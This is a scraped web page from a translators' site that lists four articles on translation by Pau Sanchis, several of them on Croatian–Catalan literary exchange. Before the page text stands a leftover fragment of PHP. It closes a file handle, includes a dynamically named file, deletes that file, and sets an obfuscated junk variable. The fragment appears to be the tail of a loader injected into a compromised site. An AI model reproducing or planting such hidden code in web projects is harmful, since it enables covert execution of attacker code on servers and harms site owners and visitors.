");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Secondary literature about - Pau Sanchis
Facebook Twitter
Cover > Translators Site > Pau Sanchis > Articles sobre traducció

Articles sobre traducció

  • SANCHIS, Pau. «L’aventura del traductor explorador». XX Seminari sobre la Traducció a Catalunya. La traducció de poesia. Barcelona: AELC, 2011
  • SANCHIS, Pau . «Una porta oberta no fa gaire: els intercanvis literaris entre el croat i el català». Quaderns de Traducció 18 (2011)
  • SANCHIS, Pau. «16 katalonskih pjesnika, na primjer» (16 poetes catalans, per exemple). Quorum [Zagreb], 5/6 (2010)
  • SANCHIS, Pau. «Notes sobre literatura croata». Caràcters 53 (2010)
With the support of: